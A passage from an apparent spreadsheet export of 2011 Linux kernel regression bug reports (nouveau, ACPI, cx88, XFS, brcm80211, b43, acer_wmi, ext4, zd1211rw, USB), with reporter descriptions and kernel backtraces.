[&lt;ffffffff8132ef78&gt;] really_probe+0x68/0x190 [ 17.227594] [&lt;ffffffff8132f285&gt;] driver_probe_device+0x45/0x70 [ 17.227598] [&lt;ffffffff8132f35b&gt;] __driver_attach+0xab/0xb0 [ 17.227602] [&lt;ffffffff8132e096&gt;] bus_for_each_dev+0x66/0x90 [ 17.227607] [&lt;ffffffff8132edce&gt;] driver_attach+0x1e/0x20 [ 17.227611] [&lt;ffffffff8132e998&gt;] bus_add_driver+0x158/0x290 [ 17.227616] [&lt;ffffffff8132f614&gt;] driver_register+0x74/0x130 [ 17.227620] [&lt;ffffffff812976d6&gt;] __pci_register_driver+0x66/0xe0 [ 17.227625] [&lt;ffffffffa075977f&gt;] drm_pci_init+0xdf/0xf0 [drm] [ 17.227635] [&lt;ffffffffa0750748&gt;] drm_init+0x58/0x70 [drm] [ 17.227643] [&lt;ffffffffa0887048&gt;] nouveau_init+0x48/0x4a [nouveau] [ 17.227656] [&lt;ffffffff810002e4&gt;] do_one_initcall+0x44/0x180 [ 17.227661] [&lt;ffffffff8109693a&gt;] sys_init_module+0xca/0x210 [ 17.227665] [&lt;ffffffff8100268b&gt;] system_call_fastpath+0x16/0x1b [ 17.227669] [ 17.227671] [ 17.227672] stack backtrace: [ 17.227675] Pid: 2506, comm: modprobe Not tainted 2.6.38-wl-65107-gc5f1016-dirty #211 [ 17.227678] Call Trace: [ 17.227680] &lt;IRQ&gt; [&lt;ffffffff81082c07&gt;] ? print_irq_inversion_bug+0x137/0x160 [ 17.227689] [&lt;ffffffff81082cb9&gt;] ? check_usage_forwards+0x89/0x100 [ 17.227695] [&lt;ffffffff810759b5&gt;] ? sched_clock_local+0x25/0x90 [ 17.227699] [&lt;ffffffff81082c30&gt;] ? check_usage_forwards+0x0/0x100 [ 17.227704] [&lt;ffffffff81084839&gt;] ? mark_lock_irq+0x99/0x2b0 [ 17.227708] [&lt;ffffffff810109cd&gt;] ? save_stack_trace+0x2d/0x50 [ 17.227713] [&lt;ffffffff81084bc1&gt;] ? mark_lock+0x171/0x420 [ 17.227717] [&lt;ffffffff8108500d&gt;] ? mark_irqflags+0x19d/0x1c0 [ 17.227722] [&lt;ffffffff8108716c&gt;] ? __lock_acquire+0x5ac/0xa80 [ 17.227726] [&lt;ffffffff8149cb65&gt;] ? _raw_spin_unlock+0x55/0x60 [ 17.227731] [&lt;ffffffff81009d79&gt;] ? native_sched_clock+0x29/0x80 [ 17.227735] [&lt;ffffffff81087d4e&gt;] ? lock_acquire+0x9e/0x1d0 [ 17.227751] [&lt;ffffffffa07e93bf&gt;] ? nouveau_irq_handler+0x5f/0x130 [nouveau] [ 17.227756] [&lt;ffffffff8149bfa2&gt;] ? _raw_spin_lock_irqsave+0x52/0x90 [ 17.227772] [&lt;ffffffffa07e93bf&gt;] ? nouveau_irq_handler+0x5f/0x130 [nouveau] [ 17.227776] [&lt;ffffffff81075b48&gt;] ? sched_clock_cpu+0xa8/0x120 [ 17.227792] [&lt;ffffffffa07e93bf&gt;] ? nouveau_irq_handler+0x5f/0x130 [nouveau] [ 17.227797] [&lt;ffffffff8108178e&gt;] ? put_lock_stats.clone.14+0xe/0x40 [ 17.227801] [&lt;ffffffff81081868&gt;] ? lock_release_holdtime+0xa8/0x150 [ 17.227806] [&lt;ffffffff810a6fd9&gt;] ? handle_IRQ_event+0x79/0x2f0 [ 17.227810] [&lt;ffffffff810a99f2&gt;] ? handle_fasteoi_irq+0x72/0x100 [ 17.227816] [&lt;ffffffff810a99fd&gt;] ? handle_fasteoi_irq+0x7d/0x100 [ 17.227820] [&lt;ffffffff81004e52&gt;] ? handle_irq+0x22/0x40 [ 17.227824] [&lt;ffffffff81004add&gt;] ? do_IRQ+0x5d/0xe0 [ 17.227828] [&lt;ffffffff8149d153&gt;] ? ret_from_intr+0x0/0x13 [ 17.227831] &lt;EOI&gt; [&lt;ffffffff81087d63&gt;] ? lock_acquire+0xb3/0x1d0 [ 17.227840] [&lt;ffffffff8122e367&gt;] ? debugfs_create_by_name+0x57/0x1d0 [ 17.227844] [&lt;ffffffff81075b48&gt;] ? sched_clock_cpu+0xa8/0x120 [ 17.227849] [&lt;ffffffff8149a523&gt;] ? mutex_lock_nested+0x73/0x3b0 [ 17.227853] [&lt;ffffffff8122e367&gt;] ? debugfs_create_by_name+0x57/0x1d0 [ 17.227859] [&lt;ffffffff8114487d&gt;] ? simple_pin_fs+0x4d/0xb0 [ 17.227863] [&lt;ffffffff8122e367&gt;] ? debugfs_create_by_name+0x57/0x1d0 [ 17.227868] [&lt;ffffffff8114487d&gt;] ? simple_pin_fs+0x4d/0xb0 [ 17.227873] [&lt;ffffffff8103f221&gt;] ? get_parent_ip+0x11/0x50 [ 17.227878] [&lt;ffffffff8122e367&gt;] ? debugfs_create_by_name+0x57/0x1d0 [ 17.227883] [&lt;ffffffff8122e568&gt;] ? debugfs_create_file+0x88/0xb0 [ 17.227887] [&lt;ffffffff8122e62b&gt;] ? debugfs_create_dir+0x1b/0x20 [ 17.227906] [&lt;ffffffffa086141a&gt;] ? nouveau_debugfs_channel_init+0xca/0xf0 [nouveau] [ 17.227922] [&lt;ffffffffa07e57d1&gt;] ? nouveau_channel_alloc+0x2c1/0x470 [nouveau] [ 17.227938] [&lt;ffffffffa07e3df1&gt;] ? nouveau_card_init_channel+0x51/0x170 [nouveau] [ 17.227953] [&lt;ffffffffa07e4308&gt;] ? nouveau_card_init+0x258/0x3d0 [nouveau] [ 17.227968] [&lt;ffffffffa07e47c9&gt;] ? nouveau_load+0x329/0x550 [nouveau] [ 17.227980] [&lt;ffffffffa0759290&gt;] ? drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.227997] [&lt;ffffffffa0861e79&gt;] ? nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.228002] [&lt;ffffffff81296cdf&gt;] ? local_pci_probe+0x5f/0xd0 [ 17.228007] [&lt;ffffffff81297458&gt;] ? pci_device_probe+0x88/0xb0 [ 17.228012] [&lt;ffffffff8132ee4a&gt;] ? driver_sysfs_add+0x7a/0xb0 [ 17.228016] [&lt;ffffffff8132ef78&gt;] ? really_probe+0x68/0x190 [ 17.228021] [&lt;ffffffff8132f285&gt;] ? driver_probe_device+0x45/0x70 [ 17.228026] [&lt;ffffffff8132f35b&gt;] ? __driver_attach+0xab/0xb0 [ 17.228030] [&lt;ffffffff8132f2b0&gt;] ? __driver_attach+0x0/0xb0 [ 17.228035] [&lt;ffffffff8132e096&gt;] ? bus_for_each_dev+0x66/0x90 [ 17.228039] [&lt;ffffffff8132edce&gt;] ? driver_attach+0x1e/0x20 [ 17.228044] [&lt;ffffffff8132e998&gt;] ? bus_add_driver+0x158/0x290 [ 17.228057] [&lt;ffffffffa0887000&gt;] ? nouveau_init+0x0/0x4a [nouveau] [ 17.228062] [&lt;ffffffff8132f614&gt;] ? driver_register+0x74/0x130 [ 17.228076] [&lt;ffffffffa0887000&gt;] ? nouveau_init+0x0/0x4a [nouveau] [ 17.228081] [&lt;ffffffff812976d6&gt;] ? __pci_register_driver+0x66/0xe0 [ 17.228092] [&lt;ffffffffa075977f&gt;] ? drm_pci_init+0xdf/0xf0 [drm] [ 17.228105] [&lt;ffffffffa0887000&gt;] ? nouveau_init+0x0/0x4a [nouveau] [ 17.228114] [&lt;ffffffffa0750748&gt;] ? drm_init+0x58/0x70 [drm] [ 17.228127] [&lt;ffffffffa0887048&gt;] ? nouveau_init+0x48/0x4a [nouveau] [ 17.228132] [&lt;ffffffff810002e4&gt;] ? do_one_initcall+0x44/0x180 [ 17.228137] [&lt;ffffffff8109693a&gt;] ? sys_init_module+0xca/0x210 [ 17.228141] [&lt;ffffffff8100268b&gt;] ? system_call_fastpath+0x16/0x1b</t>
  </si>
  <si>
    <t>boot panic unless acpi=off, Thread overran stack, or stack corrupted - Toshiba Satellite/mobile P4</t>
  </si>
  <si>
    <t>2011-03-25 20:17 UTC</t>
  </si>
  <si>
    <t>Pascal Dormeau</t>
  </si>
  <si>
    <t>2011-04-30 19:53 UTC</t>
  </si>
  <si>
    <t>Created attachment 51972 [details] lspci -vvv My laptop cannot boot anymore with latest 2.6.38 kernel (also confirmed with 2.6.38 rc6, rc7 and rc8) while ACPI support is enabled (booting with ACPI=off allows ending the boot sequence but many functionalities are lost). A kernel panic occurs early during the boot. Older kernels until 2.6.37.2 did not trigger this bug on that laptop. It's the official Debian kernel 2.6.38-1-686.</t>
  </si>
  <si>
    <t>full speed fan starting with 2.6.38 - HP Compaq 6715s</t>
  </si>
  <si>
    <t>2011-03-27 01:01 UTC</t>
  </si>
  <si>
    <t>katabami</t>
  </si>
  <si>
    <t>2011-04-12 21:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 52102 [details] Output from 'ls -R /sys/class/thermal' In kernel 2.6.38, the cpu fan runs at its full speed. I have HP Compaq 6715s with the cpu Mobile Sempron 3400+. 2.6.37 was ok (but it had another problem.) Attached is the output from ls -R /sys/class/thermal. The result is the same as previous kernel versions. Changes I've noticed are: * thermal/{cooling_device,thermal_zone}?/power has new entries autosuspend_delay_ms, wakeup_active{,_count}, wakeup_{hit_count,last_time_ms,max_time_ms,total_time_ms} * In 'flag' field of cat /proc/cpuinfo, 'nopl' is added. Rafael Wysocki said to come here. Thank you very much in advance.</t>
  </si>
  <si>
    <t>cx88-blackbird broken (since 2.6.37 ?)</t>
  </si>
  <si>
    <t>2011-03-27 16:09 UTC</t>
  </si>
  <si>
    <t>Andi Huber</t>
  </si>
  <si>
    <t>2011-06-04 09:39 UTC</t>
  </si>
  <si>
    <t>[Symptom] Processes that try to open a cx88-blackbird driven MPEG device will hang up. [Cause] Nested mutex_locks (which are not allowed) result in a deadlock. [Details] There has been resent work on removing BKL (BigKernelLock) calls from kernel code. (see http://kernelnewbies.org/BigKernelLock) This was not properly done for the cx88-blackbird driver: Source-File: drivers/media/video/cx88/cx88-blackbird.c Function: int mpeg_open(struct file *file) Problem: the calls to drv-&gt;request_acquire(drv); and drv-&gt;request_release(drv); will hang because they try to lock a mutex that has already been locked by a previouse call to mutex_lock(&amp;dev-&gt;core-&gt;lock) ... 1050 static int mpeg_open(struct file *file) 1051 { [...] 1060 mutex_lock(&amp;dev-&gt;core-&gt;lock); // MUTEX LOCKED !!!!!!!!!!!!!!!! 1061 1062 /* Make sure we can acquire the hardware */ 1063 drv = cx8802_get_driver(dev, CX88_MPEG_BLACKBIRD); 1064 if (drv) { 1065 err = drv-&gt;request_acquire(drv); // HANGS !!!!!!!!!!!!!!!!!!! 1066 if(err != 0) { 1067 dprintk(1,"%s: Unable to acquire hardware, %d\n", __func__, err); 1068 mutex_unlock(&amp;dev-&gt;core-&gt;lock);; 1069 return err; 1070 } 1071 } [...] Here's the relevant kernel log extract (Linux version 2.6.38-1-amd64 (Debian 2.6.38-1)) ... Mar 24 21:25:10 xen kernel: [ 241.472067] INFO: task v4l_id:1000 blocked for more than 120 seconds. Mar 24 21:25:10 xen kernel: [ 241.478845] "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. Mar 24 21:25:10 xen kernel: [ 241.482412] v4l_id D ffff88006bcb6540 0 1000 1 0x00000000 Mar 24 21:25:10 xen kernel: [ 241.486031] ffff88006bcb6540 0000000000000086 ffff880000000001 ffff88006981c380 Mar 24 21:25:10 xen kernel: [ 241.489694] 0000000000013700 ffff88006be5bfd8 ffff88006be5bfd8 0000000000013700 Mar 24 21:25:10 xen kernel: [ 241.493301] ffff88006bcb6540 ffff88006be5a010 ffff88006bcb6540 000000016be5a000 Mar 24 21:25:10 xen kernel: [ 241.496766] Call Trace: Mar 24 21:25:10 xen kernel: [ 241.500145] [&lt;ffffffff81321c4a&gt;] ? __mutex_lock_common+0x127/0x193 Mar 24 21:25:10 xen kernel: [ 241.503630] [&lt;ffffffff81321d82&gt;] ? mutex_lock+0x1a/0x33 Mar 24 21:25:10 xen kernel: [ 241.507145] [&lt;ffffffffa09dd155&gt;] ? cx8802_request_acquire+0x66/0xc6 [cx8802] Mar 24 21:25:10 xen kernel: [ 241.510699] [&lt;ffffffffa0aab7f2&gt;] ? mpeg_open+0x7a/0x1fc [cx88_blackbird] Mar 24 21:25:10 xen kernel: [ 241.514279] [&lt;ffffffff8123bfb6&gt;] ? kobj_lookup+0x139/0x173 Mar 24 21:25:10 xen kernel: [ 241.517856] [&lt;ffffffffa062d5fd&gt;] ? v4l2_open+0xb3/0xdf [videodev]</t>
  </si>
  <si>
    <t>XFS memory allocation deadlock in 2.6.38</t>
  </si>
  <si>
    <t>2011-03-27 18:10 UTC</t>
  </si>
  <si>
    <t>2011-05-01 14:44 UTC</t>
  </si>
  <si>
    <t>Subject : XFS memory allocation deadlock in 2.6.38 Submitter : Sean Noonan &lt;Sean.Noonan@twosigma.com&gt; Date : 2011-03-21 16:19 Message-ID : 081DDE43F61F3D43929A181B477DCA95639B52FD@MSXAOA6.twosigma.com References : http://marc.info/?l=linux-kernel&amp;m=130072585111310&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Divide error in minstrel_ht_tx_status followed by hang</t>
  </si>
  <si>
    <t>2011-03-27 21:46 UTC</t>
  </si>
  <si>
    <t>Wouter Cloetens</t>
  </si>
  <si>
    <t>2011-05-30 08:35 UTC</t>
  </si>
  <si>
    <t>Roland Vossen</t>
  </si>
  <si>
    <t>Created attachment 52232 [details] syslog capturing crashes Debian Squeeze with updated kernels containing brcm80211 driver. Reproduced with the following kernel packages: linux-image-2.6.37-trunk-686 2.6.37-1~experimental.1 linux-image-2.6.37.2-686 2.6.37-2 linux-image-2.6.38-1-686 2.6.38-1 with two different firmware versions for brcm80211, currently: firmware-brcm80211 0.29 The system worked reliably with the first kernel until an automated package update occurred. Wireless is now unusable. I have been unable to trace what may have changed to trigger the problem. After associating, the following crash occurs, followed by a second crash in acpi_idle_enter_bm, which then keeps occurring, rendering the system completely hung in a matter of seconds. Mar 27 14:31:10 davin kernel: [ 1716.250150] divide error: 0000 [#1] SMP Mar 27 14:31:10 davin kernel: [ 1716.250305] last sysfs file: /sys/module/aes_generic/initstate Mar 27 14:31:10 davin kernel: [ 1716.250478] Modules linked in: aes_i586 aes_generic hidp hid acpi_cpufreq mperf cpufreq_conservative cpufreq_powersave cpufreq_userspace cpufreq_stats parport_pc ppdev lp parport sco bridge stp bnep rfcomm l2cap binfmt_misc uinput fuse loop arc4 snd_hda_codec_realtek ecb snd_hda_intel joydev snd_hda_codec snd_hwdep brcm80211(C) snd_pcm mac80211 snd_seq snd_timer snd_seq_device i915 cfg80211 drm_kms_helper tpm_tis snd psmouse tpm btusb uvcvideo bluetooth soundcore i2c_i801 drm rfkill i2c_algo_bit ac tpm_bios video videodev serio_raw i2c_core evdev pcspkr snd_page_alloc battery power_supply button processor ext4 mbcache jbd2 crc16 sd_mod crc_t10dif ahci libahci libata uhci_hcd scsi_mod ehci_hcd usbcore sky2 thermal thermal_sys nls_base [last unloaded: scsi_wait_scan] Mar 27 14:31:10 davin kernel: [ 1716.253132] Mar 27 14:31:10 davin kernel: [ 1716.253186] Pid: 0, comm: kworker/0:0 Tainted: G C 2.6.38-1-686 #1 SAMSUNG ELECTRONICS CO., LTD. NF110/NF210/NF310 /NF110/NF210/NF310 Mar 27 14:31:10 davin kernel: [ 1716.253637] EIP: 0060:[&lt;f8e7e46f&gt;] EFLAGS: 00010246 CPU: 1 Mar 27 14:31:10 davin kernel: [ 1716.253830] EIP is at minstrel_ht_tx_status+0x462/0x675 [mac80211] Mar 27 14:31:10 davin kernel: [ 1716.254008] EAX: 0000006c EBX: ef452068 ECX: 00010000 EDX: 00000000 Mar 27 14:31:10 davin kernel: [ 1716.254008] ESI: ef452000 EDI: ef452000 EBP: 00000000 ESP: f68d9f04 Mar 27 14:31:10 davin kernel: [ 1716.254008] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Mar 27 14:31:10 davin kernel: [ 1716.254008] Process kworker/0:0 (pid: 0, ti=f68d8000 task=f684acb0 task.ti=f68d4000) Mar 27 14:31:10 davin kernel: [ 1716.254008] Stack: Mar 27 14:31:10 davin kernel: [ 1716.254008] 00000000 ef452000 ef452068 e5ce76c0 00000000 00000000 00000000 ef6f7220 Mar 27 14:31:10 davin kernel: [ 1716.254008] 00000000 00000000 00000000 00000000 00010000 00000000 f8e8224c ef6f7000 Mar 27 14:31:10 davin kernel: [ 1716.254008] e5ce76d8 e5ce76c0 f8e63205 ef452000 e5ce76c0 ef2ea2c0 e5ce76d8 f5b0c086 Mar 27 14:31:10 davin kernel: [ 1716.254008] Call Trace: Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;f8e63205&gt;] ? ieee80211_tx_status+0x234/0x6b7 [mac80211] Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;f8e62933&gt;] ? ieee80211_tasklet_handler+0x4a/0x8c [mac80211] Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c10347fd&gt;] ? __do_softirq+0x0/0x14f Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c1033cd7&gt;] ? tasklet_action+0x61/0x9f Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c1034898&gt;] ? __do_softirq+0x9b/0x14f Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c10347fd&gt;] ? __do_softirq+0x0/0x14f Mar 27 14:31:10 davin kernel: [ 1716.254008] &lt;IRQ&gt; Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c1034781&gt;] ? irq_exit+0x26/0x59 Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c1003e63&gt;] ? do_IRQ+0x73/0x84 Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c10034b0&gt;] ? common_interrupt+0x30/0x38 Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;f85a5cde&gt;] ? acpi_idle_enter_bm+0x247/0x284 [processor] Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c11ded9b&gt;] ? cpuidle_idle_call+0xd4/0x15d Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c1002201&gt;] ? cpu_idle+0x95/0xb0 Mar 27 14:31:10 davin kernel: [ 1716.254008] [&lt;c1288b52&gt;] ? start_secondary+0x1b8/0x1bd Mar 27 14:31:10 davin kernel: [ 1716.254008] Code: 89 43 e4 8b 4c 24 08 8b 49 08 81 f9 98 19 00 00 89 4c 24 30 77 0c 8b 44 24 08 c7 00 00 00 00 00 eb 32 0f b7 6e 0a 31 d2 8b 46 1c &lt;f7&gt; f5 8b 14 24 89 c1 8b 44 24 18 03 8c 90 18 f0 e7 f8 b8 40 42 Mar 27 14:31:10 davin kernel: [ 1716.254008] EIP: [&lt;f8e7e46f&gt;] minstrel_ht_tx_status+0x462/0x675 [mac80211] SS:ESP 0068:f68d9f04</t>
  </si>
  <si>
    <t>b43: Panic at random intervals</t>
  </si>
  <si>
    <t>2011-03-27 22:15 UTC</t>
  </si>
  <si>
    <t>bjorn.ottervik</t>
  </si>
  <si>
    <t>2011-04-12 09:26 UTC</t>
  </si>
  <si>
    <t>Created attachment 52242 [details] Full dmesg BMC4312 set up as access point by hostapd 0.7.3. Hardware is an HP 2133 mini notebook. Reproducable at least as far back as 2.6.35; have not tried earlier versions. Problem disappears if B43_FORCE_PIO=y is set, but so does connectivity. [192500.881342] skb_over_panic: text:f80fc27d len:2378 put:2378 head:cfbf0000 data:cfbf0040 tail:0xcfbf098a end:0xcfbf0980 dev:&lt;NULL&gt; [192500.881582] ------------[ cut here ]------------ [192500.881638] kernel BUG at net/core/skbuff.c:127! [192500.881693] invalid opcode: 0000 [#1] SMP [192500.881751] last sysfs file: /sys/devices/pci0000:80/0000:80:01.0/class [192500.881811] Modules linked in: b43 ssb [192500.881871] [192500.881921] Pid: 29751, comm: irq/24-b43 Not tainted 2.6.38 #1 Hewlett-Packard HP 2133/3030 [192500.882036] EIP: 0060:[&lt;c14edd4c&gt;] EFLAGS: 00010286 CPU: 0 [192500.882103] EIP is at skb_put+0x8c/0x90 [192500.882157] EAX: 0000008c EBX: cfbf098a ECX: c187b23c EDX: fffece37 [192500.882218] ESI: 00000000 EDI: cfbf0040 EBP: e7043e8c ESP: e7043e60 [192500.882278] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [192500.882286] Process irq/24-b43 (pid: 29751, ti=e7042000 task=cf66d860 task.ti=e7042000) [192500.882286] Stack: [192500.882286] c182a850 f80fc27d 0000094a 0000094a cfbf0000 cfbf0040 cfbf098a cfbf0980 [192500.882286] c1825d52 cf2e4960 0000092c e7043ee8 f80fc27d f5763810 00000020 140e7ef4 [192500.882286] 00000000 f6c067f8 0000af14 c1876244 cf2e4980 cf2e4984 f8102a34 00000003 [192500.882286] Call Trace: [192500.882286] [&lt;f80fc27d&gt;] ? b43_dma_rx+0x18d/0x410 [b43] [192500.882286] [&lt;f80fc27d&gt;] b43_dma_rx+0x18d/0x410 [b43] [192500.882286] [&lt;f80e7af0&gt;] b43_do_interrupt_thread+0x400/0x8e0 [b43] [192500.882286] [&lt;c12507ea&gt;] ? radix_tree_lookup+0xa/0x10 [192500.882286] [&lt;c108c11f&gt;] ? irq_to_desc+0xf/0x20 [192500.882286] [&lt;c10033e9&gt;] ? common_interrupt+0x29/0x30 [192500.882286] [&lt;f80e7fe8&gt;] b43_interrupt_thread_handler+0x18/0x30 [b43] [192500.882286] [&lt;c108cb33&gt;] irq_thread+0xf3/0x1f0 [192500.882286] [&lt;c108ca40&gt;] ? irq_thread+0x0/0x1f0 [192500.882286] [&lt;c1057da4&gt;] kthread+0x74/0x80 [192500.882286] [&lt;c1057d30&gt;] ? kthread+0x0/0x80 [192500.882286] [&lt;c10033f6&gt;] kernel_thread_helper+0x6/0x10 [192500.882286] Code: 4c 24 14 8b 88 a4 00 00 00 89 54 24 0c 89 4c 24 10 8b 40 50 c7 04 24 50 a8 82 c1 89 44 24 08 8b 45 04 89 44 24 04 e8 5c b0 15 00 &lt;0f&gt; 0b 66 90 55 89 e5 56 89 c6 53 0f b6 40 65 83 e0 18 3c 08 0f [192500.882286] EIP: [&lt;c14edd4c&gt;] skb_put+0x8c/0x90 SS:ESP 0068:e7043e60 [192500.884580] ---[ end trace fcffd54cea6ad1fe ]--- [192500.884679] exiting task "irq/24-b43" (29751) is an active IRQ thread (irq 24)</t>
  </si>
  <si>
    <t>Unloading wmi module causes a kernel oops.</t>
  </si>
  <si>
    <t>2.6.37 and newer</t>
  </si>
  <si>
    <t>2011-03-28 12:15 UTC</t>
  </si>
  <si>
    <t>Coacher</t>
  </si>
  <si>
    <t>2012-01-15 17:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 52302 [details] lspci -vvv Hello. I have Acer Aspire TimelineX 1830T so I'm using acer_wmi module. Since 2.6.37 there is a regression which is causing a NULL pointer dereference and kernel oops. Steps to reproduce: 1. Boot any kernel newer than 2.6.37 (tested on 2.6.37.1, .3, .4, .5 and 2.6.38.1) with acer_wmi built as module 2. Run "modprobe -r acer_wmi" 3. Kernel oops! On 2.6.36, .1, .2, .4 works flawlessly. Running ArchLinux x86_64. lspci -vvv and appropriate part of everything.log attached. Can provide any other info if needed.</t>
  </si>
  <si>
    <t>unable to mount root because of: "block: Require subsystems to explicitly allocate bio_set integrity mempool"</t>
  </si>
  <si>
    <t>2.6.38-08184-gd39dd11</t>
  </si>
  <si>
    <t>2011-03-28 17:11 UTC</t>
  </si>
  <si>
    <t>2011-04-17 12:36 UTC</t>
  </si>
  <si>
    <t>Hello, the commit a91a2785b200864aef2270ed6a3babac7a253a20 break mounting of my root (on LVM on a RAID10). Reverting the above commit with last available kernel (2.6.38-08817-g45699a7) will solve the situation. See #24012 for some info about my configuration (and previous good dmesg). In next hours I will post also the good and bad dmesg. ciao cate</t>
  </si>
  <si>
    <t>ext4: oops when mounting intentionally corrupted filesystem</t>
  </si>
  <si>
    <t>2.6.38.2</t>
  </si>
  <si>
    <t>2011-03-28 23:11 UTC</t>
  </si>
  <si>
    <t>2011-04-12 09:24 UTC</t>
  </si>
  <si>
    <t>Created attachment 52392 [details] Test ext4 file system (intentionally corrupted) Mounting the attached (intentionally corrupted) ext4 filesystem image causes a kernel OOPS (under KVM, vanilla 2.6.38.2, x86-64) Steps to reproduce: 1. bunzip2 hdb.41.bz2 2. mount hdb.41 /mnt -t ext4 -o errors=continue [oops] Here's the dmesg output after issuing the mount command: ------------------------------------------------------------ ------------[ cut here ]------------ kernel BUG at kernel/timer.c:659! invalid opcode: 0000 [#1] last sysfs file: CPU 0 Pid: 2639, comm: mount Not tainted 2.6.38.2 #3 Bochs Bochs RIP: 0010:[&lt;ffffffff81054983&gt;] [&lt;ffffffff81054983&gt;] mod_timer+0x1d3/0x250 RSP: 0000:ffff880003757ac8 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff880003d83500 RCX: 0000000000000000 RDX: 0000000000000000 RSI: 000000010148cdae RDI: ffff880003d83500 RBP: ffff880003757b08 R08: 0000000000000000 R09: 0000000004000000 R10: 0000000000000000 R11: 0000000000000000 R12: 000000010148cdae R13: 000000010148cdae R14: ffffffff81c23b05 R15: ffffffff81efa148 FS: 0000000000000000(0000) GS:ffffffff8221e000(0063) knlGS:00000000f7587960 CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b CR2: 000000000856d000 CR3: 000000000376e000 CR4: 00000000000006b0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process mount (pid: 2639, threadinfo ffff880003756000, task ffff88000556ef90) Stack: 0000000000000002 0000000000000002 ffff880004490208 0000000000000000 ffff8800076e7400 ffff880003d81000 0000000000001385 ffffffff81c23b05 ffff880003757b38 ffffffff811e9b5a ffff880003d81000 0000000000000000 Call Trace: [&lt;ffffffff811e9b5a&gt;] __save_error_info+0x9a/0x110 [&lt;ffffffff811ee7f1&gt;] save_error_info+0x11/0x30 [&lt;ffffffff811efc31&gt;] ext4_error_inode+0x61/0x110 [&lt;ffffffff8111d5b6&gt;] ? __wait_on_buffer+0x26/0x30 [&lt;ffffffff811d4710&gt;] ? __ext4_get_inode_loc+0x1e0/0x400 [&lt;ffffffff811d69f4&gt;] ext4_iget+0x714/0x830 [&lt;ffffffff81074188&gt;] ? debug_mutex_init+0x38/0x50 [&lt;ffffffff811f28d4&gt;] ext4_fill_super+0x1664/0x2890 [&lt;ffffffff81078d0d&gt;] ? trace_hardirqs_on_caller+0x13d/0x180 [&lt;ffffffff810f4f37&gt;] mount_bdev+0x1a7/0x1f0 [&lt;ffffffff811f1270&gt;] ? ext4_fill_super+0x0/0x2890 [&lt;ffffffff811e82f0&gt;] ext4_mount+0x10/0x20 [&lt;ffffffff810f52d8&gt;] vfs_kern_mount+0x88/0x280 [&lt;ffffffff810f56df&gt;] do_kern_mount+0x4f/0x100 [&lt;ffffffff811102fb&gt;] do_mount+0x3db/0x810 [&lt;ffffffff8110fe40&gt;] ? copy_mount_options+0xf0/0x190 [&lt;ffffffff8113729f&gt;] compat_sys_mount+0x12f/0x280 [&lt;ffffffff81033642&gt;] ia32_sysret+0x0/0x5 Code: 50 48 e9 04 ff ff ff 90 4d 89 e5 49 29 c5 49 c1 ed 08 4d 01 e5 e9 80 fe ff ff 66 0f 1f 44 00 00 41 bd 01 00 00 00 e9 48 ff ff ff &lt;0f&gt; 0b 49 89 c6 e9 1d ff ff ff 4c 8b 35 0c 8e 2c 01 4d 85 f6 0f RIP [&lt;ffffffff81054983&gt;] mod_timer+0x1d3/0x250 RSP &lt;ffff880003757ac8&gt; ---[ end trace 1b18f0361c17f387 ]--- ./runtest: line 35: 2639 Segmentation fault mount $HDB /mnt -t ext4 -o errors=continue ------------------------------------------------------------</t>
  </si>
  <si>
    <t>Regression in zd1211rw</t>
  </si>
  <si>
    <t>2011-03-29 05:23 UTC</t>
  </si>
  <si>
    <t>2011-04-12 09:23 UTC</t>
  </si>
  <si>
    <t>Starting with commit eefdbec1ea8b, my wireless card using the zd1211rw driver fails to connect to an access point. The card appears in lsusb as "ID 07b8:6001 AboCom Systems Inc 802.11bg".</t>
  </si>
  <si>
    <t>Writes to USB flash drives are extremely slow in 2.6.38</t>
  </si>
  <si>
    <t>2011-03-29 08:10 UTC</t>
  </si>
  <si>
    <t>Delan Azabani</t>
  </si>
  <si>
    <t>2011-05-13 00:54 UTC</t>
  </si>
  <si>
    <t>Created attachment 52422 [details] screenshot example Upon compiling and installing the final version of the 2.6.38 kernel, writes to USB storage have become extremely slow. I've tried all ports available on various known-working flash drives, and get speeds around 0.2MB/s rather than 5-10MB/s. I will test 2.6.37 again to make sure it's really to do with the kernel soon, when I have time. lspci: 00:00.0 Host bridge: Intel Corporation 4 Series Chipset DRAM Controller (rev 03) 00:01.0 PCI bridge: Intel Corporation 4 Series Chipset PCI Express Root Port (rev 03) 00:1a.0 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #4 00:1a.1 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #5 00:1a.2 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #6 00:1a.7 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #2 00:1b.0 Audio device: Intel Corporation 82801JI (ICH10 Family) HD Audio Controller 00:1c.0 PCI bridge: Intel Corporation 82801JI (ICH10 Family) PCI Express Root Port 1 00:1c.3 PCI bridge: Intel Corporation 82801JI (ICH10 Family) PCI Express Root Port 4 00:1c.4 PCI bridge: Intel Corporation 82801JI (ICH10 Family) PCI Express Root Port 5 00:1c.5 PCI bridge: Intel Corporation 82801JI (ICH10 